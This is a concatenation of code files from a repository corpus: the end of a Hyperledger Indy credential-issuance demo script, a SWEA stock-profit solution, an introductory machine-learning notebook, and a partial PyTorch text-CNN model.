cred_for_attr1 = creds_for_job_application_proof_request['attrs']['attr1_referent'][0]['cred_info']
cred_for_attr2 = creds_for_job_application_proof_request['attrs']['attr2_referent'][0]['cred_info']
cred_for_attr3 = creds_for_job_application_proof_request['attrs']['attr3_referent'][0]['cred_info']
cred_for_attr4 = creds_for_job_application_proof_request['attrs']['attr4_referent'][0]['cred_info']
cred_for_attr5 = creds_for_job_application_proof_request['attrs']['attr5_referent'][0]['cred_info']
cred_for_predicate1 = creds_for_job_application_proof_request['predicates']['predicate1_referent'][0]['cred_info']
creds_for_job_application_proof = {cred_for_attr1['referent']: cred_for_attr1,
cred_for_attr2['referent']: cred_for_attr2,
cred_for_attr3['referent']: cred_for_attr3,
cred_for_attr4['referent']: cred_for_attr4,
cred_for_attr5['referent']: cred_for_attr5,
cred_for_predicate1['referent']: cred_for_predicate1}
schemas_json, cred_defs_json, revoc_states_json = \
await prover_get_entities_from_ledger(pool_handle, alice_faber_did, creds_for_job_application_proof, 'Alice')
print("\"Alice\" -> Create \"Job-Application\" Proof")
job_application_requested_creds_json = json.dumps({
'self_attested_attributes': {
'attr1_referent': 'Alice',
'attr2_referent': 'Garcia',
'attr6_referent': '123-45-6789'
},
'requested_attributes': {
'attr3_referent': {'cred_id': cred_for_attr3['referent'], 'revealed': True},
'attr4_referent': {'cred_id': cred_for_attr4['referent'], 'revealed': True},
'attr5_referent': {'cred_id': cred_for_attr5['referent'], 'revealed': True},
},
'requested_predicates': {'predicate1_referent': {'cred_id': cred_for_predicate1['referent']}}
})
job_application_proof_json = \
await anoncreds.prover_create_proof(alice_wallet, authdecrypted_job_application_proof_request_json,
job_application_requested_creds_json, alice_master_secret_id,
schemas_json, cred_defs_json, revoc_states_json)
print("\"Alice\" -> Authcrypt \"Job-Application\" Proof for Acme")
authcrypted_job_application_proof_json = await crypto.auth_crypt(alice_wallet, alice_acme_key, acme_alice_verkey,
job_application_proof_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Job-Application\" Proof to Acme")
print("\"Acme\" -> Authdecrypted \"Job-Application\" Proof from Alice")
_, decrypted_job_application_proof_json, decrypted_job_application_proof = \
await auth_decrypt(acme_wallet, acme_alice_key, authcrypted_job_application_proof_json)
schemas_json, cred_defs_json, revoc_ref_defs_json, revoc_regs_json = \
await verifier_get_entities_from_ledger(pool_handle, acme_did,
decrypted_job_application_proof['identifiers'], 'Acme')
print("\"Acme\" -> Verify \"Job-Application\" Proof from Alice")
assert 'Bachelor of Science, Marketing' == \
decrypted_job_application_proof['requested_proof']['revealed_attrs']['attr3_referent']['raw']
assert 'graduated' == \
decrypted_job_application_proof['requested_proof']['revealed_attrs']['attr4_referent']['raw']
assert '123-45-6789' == \
decrypted_job_application_proof['requested_proof']['revealed_attrs']['attr5_referent']['raw']
assert 'Alice' == decrypted_job_application_proof['requested_proof']['self_attested_attrs']['attr1_referent']
assert 'Garcia' == decrypted_job_application_proof['requested_proof']['self_attested_attrs']['attr2_referent']
assert '123-45-6789' == decrypted_job_application_proof['requested_proof']['self_attested_attrs']['attr6_referent']
assert await anoncreds.verifier_verify_proof(job_application_proof_request_json,
decrypted_job_application_proof_json,
schemas_json, cred_defs_json, revoc_ref_defs_json, revoc_regs_json)
print("==============================")
print("== Apply for the job with Acme - Getting Job-Certificate Credential ==")
print("------------------------------")
print("\"Acme\" -> Create \"Job-Certificate\" Credential Offer for Alice")
job_certificate_cred_offer_json = \
await anoncreds.issuer_create_credential_offer(acme_wallet, acme_job_certificate_cred_def_id)
print("\"Acme\" -> Get key for Alice did")
alice_acme_verkey = await did.key_for_did(pool_handle, acme_wallet, acme_alice_connection_response['did'])
print("\"Acme\" -> Authcrypt \"Job-Certificate\" Credential Offer for Alice")
authcrypted_job_certificate_cred_offer = await crypto.auth_crypt(acme_wallet, acme_alice_key, alice_acme_verkey,
job_certificate_cred_offer_json.encode('utf-8'))
print("\"Acme\" -> Send authcrypted \"Job-Certificate\" Credential Offer to Alice")
print("\"Alice\" -> Authdecrypted \"Job-Certificate\" Credential Offer from Acme")
acme_alice_verkey, authdecrypted_job_certificate_cred_offer_json, authdecrypted_job_certificate_cred_offer = \
await auth_decrypt(alice_wallet, alice_acme_key, authcrypted_job_certificate_cred_offer)
print("\"Alice\" -> Get \"Acme Job-Certificate\" Credential Definition from Ledger")
(_, acme_job_certificate_cred_def) = \
await get_cred_def(pool_handle, alice_acme_did, authdecrypted_job_certificate_cred_offer['cred_def_id'])
print("\"Alice\" -> Create and store in Wallet \"Job-Certificate\" Credential Request for Acme")
(job_certificate_cred_request_json, job_certificate_cred_request_metadata_json) = \
await anoncreds.prover_create_credential_req(alice_wallet, alice_acme_did,
authdecrypted_job_certificate_cred_offer_json,
acme_job_certificate_cred_def, alice_master_secret_id)
print("\"Alice\" -> Authcrypt \"Job-Certificate\" Credential Request for Acme")
authcrypted_job_certificate_cred_request_json = \
await crypto.auth_crypt(alice_wallet, alice_acme_key, acme_alice_verkey,
job_certificate_cred_request_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Job-Certificate\" Credential Request to Acme")
print("\"Acme\" -> Authdecrypt \"Job-Certificate\" Credential Request from Alice")
alice_acme_verkey, authdecrypted_job_certificate_cred_request_json, _ = \
await auth_decrypt(acme_wallet, acme_alice_key, authcrypted_job_certificate_cred_request_json)
print("\"Acme\" -> Create \"Job-Certificate\" Credential for Alice")
alice_job_certificate_cred_values_json = json.dumps({
"first_name": {"raw": "Alice", "encoded": "245712572474217942457235975012103335"},
"last_name": {"raw": "Garcia", "encoded": "312643218496194691632153761283356127"},
"employee_status": {"raw": "Permanent", "encoded": "2143135425425143112321314321"},
"salary": {"raw": "2400", "encoded": "2400"},
"experience": {"raw": "10", "encoded": "10"}
})
job_certificate_cred_json, _, _ = \
await anoncreds.issuer_create_credential(acme_wallet, job_certificate_cred_offer_json,
authdecrypted_job_certificate_cred_request_json,
alice_job_certificate_cred_values_json, None, None)
print("\"Acme\" -> Authcrypt \"Job-Certificate\" Credential for Alice")
authcrypted_job_certificate_cred_json = \
await crypto.auth_crypt(acme_wallet, acme_alice_key, alice_acme_verkey,
job_certificate_cred_json.encode('utf-8'))
print("\"Acme\" -> Send authcrypted \"Job-Certificate\" Credential to Alice")
print("\"Alice\" -> Authdecrypted \"Job-Certificate\" Credential from Acme")
_, authdecrypted_job_certificate_cred_json, _ = \
await auth_decrypt(alice_wallet, alice_acme_key, authcrypted_job_certificate_cred_json)
print("\"Alice\" -> Store \"Job-Certificate\" Credential")
await anoncreds.prover_store_credential(alice_wallet, None, job_certificate_cred_request_metadata_json,
authdecrypted_job_certificate_cred_json,
acme_job_certificate_cred_def_json, None)
print("==============================")
print("=== Apply for the loan with Thrift ==")
print("==============================")
print("== Apply for the loan with Thrift - Onboarding ==")
print("------------------------------")
_, thrift_alice_key, alice_thrift_did, alice_thrift_key, \
thrift_alice_connection_response = await onboarding(pool_handle, pool_name, "Thrift", thrift_wallet, thrift_did,
"Alice", alice_wallet, alice_wallet_name,
alice_wallet_credentials)
print("==============================")
print("== Apply for the loan with Thrift - Job-Certificate proving ==")
print("------------------------------")
print("\"Thrift\" -> Create \"Loan-Application-Basic\" Proof Request")
apply_loan_proof_request_json = json.dumps({
'nonce': '123432421212',
'name': 'Loan-Application-Basic',
'version': '0.1',
'requested_attributes': {
'attr1_referent': {
'name': 'employee_status',
'restrictions': [{'cred_def_id': acme_job_certificate_cred_def_id}]
}
},
'requested_predicates': {
'predicate1_referent': {
'name': 'salary',
'p_type': '>=',
'p_value': 2000,
'restrictions': [{'cred_def_id': acme_job_certificate_cred_def_id}]
},
'predicate2_referent': {
'name': 'experience',
'p_type': '>=',
'p_value': 1,
'restrictions': [{'cred_def_id': acme_job_certificate_cred_def_id}]
}
}
})
print("\"Thrift\" -> Get key for Alice did")
alice_thrift_verkey = await did.key_for_did(pool_handle, thrift_wallet, thrift_alice_connection_response['did'])
print("\"Thrift\" -> Authcrypt \"Loan-Application-Basic\" Proof Request for Alice")
authcrypted_apply_loan_proof_request_json = \
await crypto.auth_crypt(thrift_wallet, thrift_alice_key, alice_thrift_verkey,
apply_loan_proof_request_json.encode('utf-8'))
print("\"Thrift\" -> Send authcrypted \"Loan-Application-Basic\" Proof Request to Alice")
print("\"Alice\" -> Authdecrypt \"Loan-Application-Basic\" Proof Request from Thrift")
thrift_alice_verkey, authdecrypted_apply_loan_proof_request_json, _ = \
await auth_decrypt(alice_wallet, alice_thrift_key, authcrypted_apply_loan_proof_request_json)
print("\"Alice\" -> Get credentials for \"Loan-Application-Basic\" Proof Request")
creds_json_for_apply_loan_proof_request = \
await anoncreds.prover_get_credentials_for_proof_req(alice_wallet, authdecrypted_apply_loan_proof_request_json)
creds_for_apply_loan_proof_request = json.loads(creds_json_for_apply_loan_proof_request)
cred_for_attr1 = creds_for_apply_loan_proof_request['attrs']['attr1_referent'][0]['cred_info']
cred_for_predicate1 = creds_for_apply_loan_proof_request['predicates']['predicate1_referent'][0]['cred_info']
cred_for_predicate2 = creds_for_apply_loan_proof_request['predicates']['predicate2_referent'][0]['cred_info']
creds_for_apply_loan_proof = {cred_for_attr1['referent']: cred_for_attr1,
cred_for_predicate1['referent']: cred_for_predicate1,
cred_for_predicate2['referent']: cred_for_predicate2}
schemas_json, cred_defs_json, revoc_states_json = \
await prover_get_entities_from_ledger(pool_handle, alice_thrift_did, creds_for_apply_loan_proof, 'Alice')
print("\"Alice\" -> Create \"Loan-Application-Basic\" Proof")
apply_loan_requested_creds_json = json.dumps({
'self_attested_attributes': {},
'requested_attributes': {
'attr1_referent': {'cred_id': cred_for_attr1['referent'], 'revealed': True}
},
'requested_predicates': {
'predicate1_referent': {'cred_id': cred_for_predicate1['referent']},
'predicate2_referent': {'cred_id': cred_for_predicate2['referent']}
}
})
alice_apply_loan_proof_json = \
await anoncreds.prover_create_proof(alice_wallet, authdecrypted_apply_loan_proof_request_json,
apply_loan_requested_creds_json, alice_master_secret_id, schemas_json,
cred_defs_json, revoc_states_json)
print("\"Alice\" -> Authcrypt \"Loan-Application-Basic\" Proof for Thrift")
authcrypted_alice_apply_loan_proof_json = \
await crypto.auth_crypt(alice_wallet, alice_thrift_key, thrift_alice_verkey,
alice_apply_loan_proof_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Loan-Application-Basic\" Proof to Thrift")
print("\"Thrift\" -> Authdecrypted \"Loan-Application-Basic\" Proof from Alice")
_, authdecrypted_alice_apply_loan_proof_json, authdecrypted_alice_apply_loan_proof = \
await auth_decrypt(thrift_wallet, thrift_alice_key, authcrypted_alice_apply_loan_proof_json)
print("\"Thrift\" -> Get Schemas, Credential Definitions and Revocation Registries from Ledger"
" required for Proof verifying")
schemas_json, cred_defs_json, revoc_defs_json, revoc_regs_json = \
await verifier_get_entities_from_ledger(pool_handle, thrift_did,
authdecrypted_alice_apply_loan_proof['identifiers'], 'Thrift')
print("\"Thrift\" -> Verify \"Loan-Application-Basic\" Proof from Alice")
assert 'Permanent' == \
authdecrypted_alice_apply_loan_proof['requested_proof']['revealed_attrs']['attr1_referent']['raw']
assert await anoncreds.verifier_verify_proof(apply_loan_proof_request_json,
authdecrypted_alice_apply_loan_proof_json,
schemas_json, cred_defs_json, revoc_defs_json, revoc_regs_json)
print("==============================")
print("==============================")
print("== Apply for the loan with Thrift - Transcript and Job-Certificate proving ==")
print("------------------------------")
print("\"Thrift\" -> Create \"Loan-Application-KYC\" Proof Request")
apply_loan_kyc_proof_request_json = json.dumps({
'nonce': '123432421212',
'name': 'Loan-Application-KYC',
'version': '0.1',
'requested_attributes': {
'attr1_referent': {'name': 'first_name'},
'attr2_referent': {'name': 'last_name'},
'attr3_referent': {'name': 'ssn'}
},
'requested_predicates': {}
})
print("\"Thrift\" -> Get key for Alice did")
alice_thrift_verkey = await did.key_for_did(pool_handle, thrift_wallet, thrift_alice_connection_response['did'])
print("\"Thrift\" -> Authcrypt \"Loan-Application-KYC\" Proof Request for Alice")
authcrypted_apply_loan_kyc_proof_request_json = \
await crypto.auth_crypt(thrift_wallet, thrift_alice_key, alice_thrift_verkey,
apply_loan_kyc_proof_request_json.encode('utf-8'))
print("\"Thrift\" -> Send authcrypted \"Loan-Application-KYC\" Proof Request to Alice")
print("\"Alice\" -> Authdecrypt \"Loan-Application-KYC\" Proof Request from Thrift")
thrift_alice_verkey, authdecrypted_apply_loan_kyc_proof_request_json, _ = \
await auth_decrypt(alice_wallet, alice_thrift_key, authcrypted_apply_loan_kyc_proof_request_json)
print("\"Alice\" -> Get credentials for \"Loan-Application-KYC\" Proof Request")
creds_json_for_apply_loan_kyc_proof_request = \
await anoncreds.prover_get_credentials_for_proof_req(alice_wallet,
authdecrypted_apply_loan_kyc_proof_request_json)
creds_for_apply_loan_kyc_proof_request = json.loads(creds_json_for_apply_loan_kyc_proof_request)
cred_for_attr1 = creds_for_apply_loan_kyc_proof_request['attrs']['attr1_referent'][0]['cred_info']
cred_for_attr2 = creds_for_apply_loan_kyc_proof_request['attrs']['attr2_referent'][0]['cred_info']
cred_for_attr3 = creds_for_apply_loan_kyc_proof_request['attrs']['attr3_referent'][0]['cred_info']
creds_for_apply_loan_kyc_proof = {cred_for_attr1['referent']: cred_for_attr1,
cred_for_attr2['referent']: cred_for_attr2,
cred_for_attr3['referent']: cred_for_attr3}
schemas_json, cred_defs_json, revoc_states_json = \
await prover_get_entities_from_ledger(pool_handle, alice_thrift_did, creds_for_apply_loan_kyc_proof, 'Alice')
print("\"Alice\" -> Create \"Loan-Application-KYC\" Proof")
apply_loan_kyc_requested_creds_json = json.dumps({
'self_attested_attributes': {},
'requested_attributes': {
'attr1_referent': {'cred_id': cred_for_attr1['referent'], 'revealed': True},
'attr2_referent': {'cred_id': cred_for_attr2['referent'], 'revealed': True},
'attr3_referent': {'cred_id': cred_for_attr3['referent'], 'revealed': True}
},
'requested_predicates': {}
})
alice_apply_loan_kyc_proof_json = \
await anoncreds.prover_create_proof(alice_wallet, authdecrypted_apply_loan_kyc_proof_request_json,
apply_loan_kyc_requested_creds_json, alice_master_secret_id,
schemas_json, cred_defs_json, revoc_states_json)
print("\"Alice\" -> Authcrypt \"Loan-Application-KYC\" Proof for Thrift")
authcrypted_alice_apply_loan_kyc_proof_json = \
await crypto.auth_crypt(alice_wallet, alice_thrift_key, thrift_alice_verkey,
alice_apply_loan_kyc_proof_json.encode('utf-8'))
print("\"Alice\" -> Send authcrypted \"Loan-Application-KYC\" Proof to Thrift")
print("\"Thrift\" -> Authdecrypted \"Loan-Application-KYC\" Proof from Alice")
_, authdecrypted_alice_apply_loan_kyc_proof_json, authdecrypted_alice_apply_loan_kyc_proof = \
await auth_decrypt(thrift_wallet, thrift_alice_key, authcrypted_alice_apply_loan_kyc_proof_json)
print("\"Thrift\" -> Get Schemas, Credential Definitions and Revocation Registries from Ledger"
" required for Proof verifying")
schemas_json, cred_defs_json, revoc_defs_json, revoc_regs_json = \
await verifier_get_entities_from_ledger(pool_handle, thrift_did,
authdecrypted_alice_apply_loan_kyc_proof['identifiers'], 'Thrift')
print("\"Thrift\" -> Verify \"Loan-Application-KYC\" Proof from Alice")
assert 'Alice' == \
authdecrypted_alice_apply_loan_kyc_proof['requested_proof']['revealed_attrs']['attr1_referent']['raw']
assert 'Garcia' == \
authdecrypted_alice_apply_loan_kyc_proof['requested_proof']['revealed_attrs']['attr2_referent']['raw']
assert '123-45-6789' == \
authdecrypted_alice_apply_loan_kyc_proof['requested_proof']['revealed_attrs']['attr3_referent']['raw']
assert await anoncreds.verifier_verify_proof(apply_loan_kyc_proof_request_json,
authdecrypted_alice_apply_loan_kyc_proof_json,
schemas_json, cred_defs_json, revoc_defs_json, revoc_regs_json)
print("==============================")
print(" \"Sovrin Steward\" -> Close and Delete wallet")
await wallet.close_wallet(steward_wallet)
await wallet.delete_wallet(steward_wallet_name, steward_wallet_credentials)
print("\"Government\" -> Close and Delete wallet")
await wallet.close_wallet(government_wallet)
await wallet.delete_wallet(government_wallet_name, government_wallet_credentials)
print("\"Faber\" -> Close and Delete wallet")
await wallet.close_wallet(faber_wallet)
await wallet.delete_wallet(faber_wallet_name, faber_wallet_credentials)
print("\"Acme\" -> Close and Delete wallet")
await wallet.close_wallet(acme_wallet)
await wallet.delete_wallet(acme_wallet_name, acme_wallet_credentials)
print("\"Thrift\" -> Close and Delete wallet")
await wallet.close_wallet(thrift_wallet)
await wallet.delete_wallet(thrift_wallet_name, thrift_wallet_credentials)
print("\"Alice\" -> Close and Delete wallet")
await wallet.close_wallet(alice_wallet)
await wallet.delete_wallet(alice_wallet_name, alice_wallet_credentials)
print("Close and Delete pool")
await pool.close_pool_ledger(pool_handle)
await pool.delete_pool_ledger_config(pool_name)
print("Getting started -> done")
async def onboarding(pool_handle, pool_name, _from, from_wallet, from_did, to,
                     to_wallet: Optional[str], to_wallet_name: str, to_wallet_credentials: str):
    """Establish a pairwise connection between agents *_from* and *to*.

    *_from* creates a pairwise DID, anchors it on the ledger and sends a
    connection request; *to* (creating/opening its wallet on first contact)
    answers with an anoncrypted response that *_from* authenticates by nonce,
    then anchors *to*'s pairwise DID on the ledger as well.

    Returns (to_wallet, from_to_key, to_from_did, to_from_key,
    decrypted_connection_response).
    """
    print("\"{}\" -> Create and store in Wallet \"{} {}\" DID".format(_from, _from, to))
    (from_to_did, from_to_key) = await did.create_and_store_my_did(from_wallet, "{}")

    print("\"{}\" -> Send Nym to Ledger for \"{} {}\" DID".format(_from, _from, to))
    await send_nym(pool_handle, from_wallet, from_did, from_to_did, from_to_key, None)

    print("\"{}\" -> Send connection request to {} with \"{} {}\" DID and nonce".format(_from, to, _from, to))
    connection_request = {
        'did': from_to_did,
        'nonce': 123456789
    }

    if not to_wallet:
        print("\"{}\" -> Create wallet".format(to))
        try:
            await wallet.create_wallet(pool_name, to_wallet_name, None, None, to_wallet_credentials)
        except IndyError as ex:
            # Fixed: wallet creation raises WalletAlreadyExistsError. The old
            # check against PoolLedgerConfigAlreadyExistsError never matched
            # and silently swallowed *every* IndyError; re-raise anything that
            # is not "wallet already exists".
            if ex.error_code != ErrorCode.WalletAlreadyExistsError:
                raise
        to_wallet = await wallet.open_wallet(to_wallet_name, None, to_wallet_credentials)

    print("\"{}\" -> Create and store in Wallet \"{} {}\" DID".format(to, to, _from))
    (to_from_did, to_from_key) = await did.create_and_store_my_did(to_wallet, "{}")

    print("\"{}\" -> Get key for did from \"{}\" connection request".format(to, _from))
    from_to_verkey = await did.key_for_did(pool_handle, to_wallet, connection_request['did'])

    print("\"{}\" -> Anoncrypt connection response for \"{}\" with \"{} {}\" DID, verkey and nonce"
          .format(to, _from, to, _from))
    connection_response = json.dumps({
        'did': to_from_did,
        'verkey': to_from_key,
        'nonce': connection_request['nonce']
    })
    anoncrypted_connection_response = await crypto.anon_crypt(from_to_verkey, connection_response.encode('utf-8'))

    print("\"{}\" -> Send anoncrypted connection response to \"{}\"".format(to, _from))
    print("\"{}\" -> Anondecrypt connection response from \"{}\"".format(_from, to))
    decrypted_connection_response = \
        json.loads((await crypto.anon_decrypt(from_wallet, from_to_key,
                                              anoncrypted_connection_response)).decode("utf-8"))

    print("\"{}\" -> Authenticates \"{}\" by comparision of Nonce".format(_from, to))
    # A matching nonce proves the response answers this exact request.
    assert connection_request['nonce'] == decrypted_connection_response['nonce']

    print("\"{}\" -> Send Nym to Ledger for \"{} {}\" DID".format(_from, to, _from))
    await send_nym(pool_handle, from_wallet, from_did, to_from_did, to_from_key, None)

    return to_wallet, from_to_key, to_from_did, to_from_key, decrypted_connection_response
async def get_verinym(pool_handle, _from, from_wallet, from_did, from_to_key,
                      to, to_wallet, to_from_did, to_from_key, role):
    """Issue a verinym: *to* creates a fresh DID, sends it authcrypted to
    *_from*, who authenticates the sender against the ledger and publishes
    the new DID with *role*.

    Returns the new DID string owned by *to*.
    """
    print("\"{}\" -> Create and store in Wallet \"{}\" new DID".format(to, to))
    (to_did, to_key) = await did.create_and_store_my_did(to_wallet, "{}")
    print("\"{}\" -> Authcrypt \"{} DID info\" for \"{}\"".format(to, to, _from))
    did_info_json = json.dumps({
        'did': to_did,
        'verkey': to_key
    })
    authcrypted_did_info_json = \
        await crypto.auth_crypt(to_wallet, to_from_key, from_to_key, did_info_json.encode('utf-8'))
    print("\"{}\" -> Send authcrypted \"{} DID info\" to {}".format(to, to, _from))
    print("\"{}\" -> Authdecrypted \"{} DID info\" from {}".format(_from, to, to))
    sender_verkey, authdecrypted_did_info_json, authdecrypted_did_info = \
        await auth_decrypt(from_wallet, from_to_key, authcrypted_did_info_json)
    print("\"{}\" -> Authenticate {} by comparision of Verkeys".format(_from, to, ))
    # The sender's verkey must match the ledger's key for the pairwise DID,
    # proving the DID info really came from *to*.
    assert sender_verkey == await did.key_for_did(pool_handle, from_wallet, to_from_did)
    print("\"{}\" -> Send Nym to Ledger for \"{} DID\" with {} Role".format(_from, to, role))
    await send_nym(pool_handle, from_wallet, from_did, authdecrypted_did_info['did'],
                   authdecrypted_did_info['verkey'], role)
    return to_did
async def send_nym(pool_handle, wallet_handle, _did, new_did, new_key, role):
    """Publish a NYM transaction for *new_did*/*new_key* with *role*, signed by *_did*."""
    await ledger.sign_and_submit_request(
        pool_handle, wallet_handle, _did,
        await ledger.build_nym_request(_did, new_did, new_key, None, role))
async def send_schema(pool_handle, wallet_handle, _did, schema):
    """Publish *schema* on the ledger in a transaction signed by *_did*."""
    await ledger.sign_and_submit_request(
        pool_handle, wallet_handle, _did,
        await ledger.build_schema_request(_did, schema))
async def send_cred_def(pool_handle, wallet_handle, _did, cred_def_json):
    """Publish the credential definition *cred_def_json*, signed by *_did*."""
    await ledger.sign_and_submit_request(
        pool_handle, wallet_handle, _did,
        await ledger.build_cred_def_request(_did, cred_def_json))
async def get_schema(pool_handle, _did, schema_id):
    """Fetch a schema from the ledger; returns the parsed (schema_id, schema_json) pair."""
    request = await ledger.build_get_schema_request(_did, schema_id)
    response = await ledger.submit_request(pool_handle, request)
    return await ledger.parse_get_schema_response(response)
async def get_cred_def(pool_handle, _did, schema_id):
    """Fetch a credential definition from the ledger; returns the parsed (id, json) pair."""
    request = await ledger.build_get_cred_def_request(_did, schema_id)
    response = await ledger.submit_request(pool_handle, request)
    return await ledger.parse_get_cred_def_response(response)
async def prover_get_entities_from_ledger(pool_handle, _did, identifiers, actor):
    """Resolve every schema / credential definition (and eventually revocation
    state) referenced by the prover's credential map *identifiers*.

    Returns three JSON strings: schemas, cred defs, revocation states.
    """
    schema_map = {}
    cred_def_map = {}
    rev_state_map = {}
    for entry in identifiers.values():
        print("\"{}\" -> Get Schema from Ledger".format(actor))
        fetched_schema_id, fetched_schema = await get_schema(pool_handle, _did, entry['schema_id'])
        schema_map[fetched_schema_id] = json.loads(fetched_schema)
        print("\"{}\" -> Get Credential Definition from Ledger".format(actor))
        fetched_cred_def_id, fetched_cred_def = await get_cred_def(pool_handle, _did, entry['cred_def_id'])
        cred_def_map[fetched_cred_def_id] = json.loads(fetched_cred_def)
        if 'rev_reg_seq_no' in entry:
            pass  # TODO Create Revocation States
    return json.dumps(schema_map), json.dumps(cred_def_map), json.dumps(rev_state_map)
async def verifier_get_entities_from_ledger(pool_handle, _did, identifiers, actor):
    """Resolve, for a verifier, every schema / credential definition (and
    eventually revocation artifacts) referenced by a proof's *identifiers* list.

    Returns four JSON strings: schemas, cred defs, revocation reg defs, revocation regs.
    """
    schema_map = {}
    cred_def_map = {}
    rev_reg_def_map = {}
    rev_reg_map = {}
    for entry in identifiers:
        print("\"{}\" -> Get Schema from Ledger".format(actor))
        fetched_schema_id, fetched_schema = await get_schema(pool_handle, _did, entry['schema_id'])
        schema_map[fetched_schema_id] = json.loads(fetched_schema)
        print("\"{}\" -> Get Credential Definition from Ledger".format(actor))
        fetched_cred_def_id, fetched_cred_def = await get_cred_def(pool_handle, _did, entry['cred_def_id'])
        cred_def_map[fetched_cred_def_id] = json.loads(fetched_cred_def)
        if 'rev_reg_seq_no' in entry:
            pass  # TODO Get Revocation Definitions and Revocation Registries
    return json.dumps(schema_map), json.dumps(cred_def_map), \
        json.dumps(rev_reg_def_map), json.dumps(rev_reg_map)
async def auth_decrypt(wallet_handle, key, message):
    """Auth-decrypt *message* and decode its JSON payload.

    Returns (sender_verkey, payload_json_str, payload_obj).
    """
    sender_verkey, raw_payload = await crypto.auth_decrypt(wallet_handle, key, message)
    payload_json = raw_payload.decode("utf-8")
    return sender_verkey, payload_json, json.loads(payload_json)
if __name__ == '__main__':
    # Drive the whole getting-started scenario on a fresh event loop.
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    loop.run_until_complete(run())
    time.sleep(1)  # FIXME waiting for libindy thread complete
# -
| 46,177 |
/SWEA/(2020.10.10)1859_백만장자프로젝트_D2.ipynb
|
bec9b0b332f0fa5478e81f66d9e508fb79710b27
|
[] |
no_license
|
HYEEWON/practice_for_coding_test_hyewon
|
https://github.com/HYEEWON/practice_for_coding_test_hyewon
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,110 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: py1
# language: python
# name: py1
# ---
T = int(input())
for t in range(1, T+1):
N = int(input())
price = list(map(int, input().split()))
max_price = price[-1]
money = 0
for i in range(N-2, -1, -1):
if max_price > price[i]:
money += max_price - price[i]
else:
max_price = price[i]
print('#'+str(t)+' '+ str(money))
| 601 |
/1.Introduction to machine learning/2.What_is_Machine_Learning.ipynb
|
327fb0ed6c3c5686c574916a3341e44157f08716
|
[] |
no_license
|
AnshuTrivedi/Microsoft-Scholarship-Foundation-course-Nanodegree-Program
|
https://github.com/AnshuTrivedi/Microsoft-Scholarship-Foundation-course-Nanodegree-Program
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 75,606 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# **Machine learning is a data science technique used to extract patterns from data, allowing computers to identify related data, and forecast future outcomes, behaviors, and trends.**
# * One important component of machine learning is that we are `taking some data and using it to make predictions or identify important relationships`.
# ## Traditional programming
from IPython.display import Image
# Display the illustrative figure for the "Traditional programming" section.
Image(filename='traditional-programming.png')

# ## Machine Learning
# Display the illustrative figure for the "Machine Learning" section.
Image(filename='machine-learning.png')
# ### Question 1
#
# Imagine you want to create a function that multiplies two numbers together (e.g., given the inputs 2 and 3, the function will generate the output 6).
#
# What approach is best suited to this problem?
# **`Traditional programming is well-suited to a problem like this, in which you are given the data (two numbers) and already know the rules (multiplication) for getting the desired output`**.
# ### Question 2
#
# Now imagine that you have some images that contain handwritten numbers. You want to create a program that will recognize which number is in each picture, but you're not sure exactly what characteristics can be used to best tell the numbers apart.
#
# Which is the best approach for creating this program?
# **`Machine learning is well suited to problems like this, in which you have the data (images) and the answers (you know which images have which numbers), but it's unclear what the rules are.`**
# Mark all of the options below that are true statements about machine learning.
#
# 1. Data is input to train an algorithm
# 2. Historical answers are input to train an algorithm
# 3. Rules are the output learned by the algorithm
| 1,953 |
/model.ipynb
|
9610c19043c366befbd598d12c34a91dcaef5e4b
|
[] |
no_license
|
qlv1/11747-HW1
|
https://github.com/qlv1/11747-HW1
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 45,272 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# From PyTorch CNN offical tutorial
import torch
import torch.nn.functional as F
import torch.nn as nn
import torch.utils.data
import numpy as np
import pandas as pd
# Use the first CUDA GPU when available, otherwise fall back to CPU.
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
class Net(nn.Module):
    """Static-embedding text CNN: three parallel 1-D convolutions over 50-dim
    word vectors, max-pooled, concatenated and classified into 16 classes.

    Input:  (batch, 50, seq_len) float tensor; with seq_len 64 each branch
            yields exactly one pooled position (kernel 5 -> 60 -> pool 60).
    Output: (batch, 16) class logits.
    """

    def __init__(self):
        super(Net, self).__init__()
        # Parallel branches with receptive fields of 3, 4 and 5 tokens.
        self.conv1 = nn.Conv1d(50, 100, 3)
        self.conv2 = nn.Conv1d(50, 100, 4)
        self.conv3 = nn.Conv1d(50, 100, 5)
        self.pool = nn.MaxPool1d(60)
        self.dropout = nn.Dropout(p=0.5)
        self.fc1 = nn.Linear(300, 16)

    def forward(self, x):
        x1 = self.pool(F.relu(self.conv1(x)))
        x2 = self.pool(F.relu(self.conv2(x)))
        x3 = self.pool(F.relu(self.conv3(x)))
        # squeeze(-1), not squeeze(): a bare squeeze() also dropped the batch
        # dimension when the batch had a single example.
        x = torch.cat((x1, x2, x3), dim=1).squeeze(-1)
        x = self.dropout(x)
        x = self.fc1(x)
        return x
net = Net().to(device)
# +
class Net_dynamic(nn.Module):
    """Text CNN with a learnable linear re-embedding of the 50-dim word
    vectors applied before the convolutional branches; otherwise the same
    architecture as ``Net``. Returns (batch, 16) logits.
    """

    def __init__(self):
        super(Net_dynamic, self).__init__()
        self.emb = nn.Linear(50, 50)  # per-token re-embedding of the word vectors
        self.conv1 = nn.Conv1d(50, 100, 3)
        self.conv2 = nn.Conv1d(50, 100, 4)
        self.conv3 = nn.Conv1d(50, 100, 5)
        self.pool = nn.MaxPool1d(60)
        self.dropout = nn.Dropout(p=0.5)
        self.fc1 = nn.Linear(300, 16)

    def forward(self, x):
        # Linear acts on the last dim: (B, C, L) -> (B, L, C) -> back to (B, C, L).
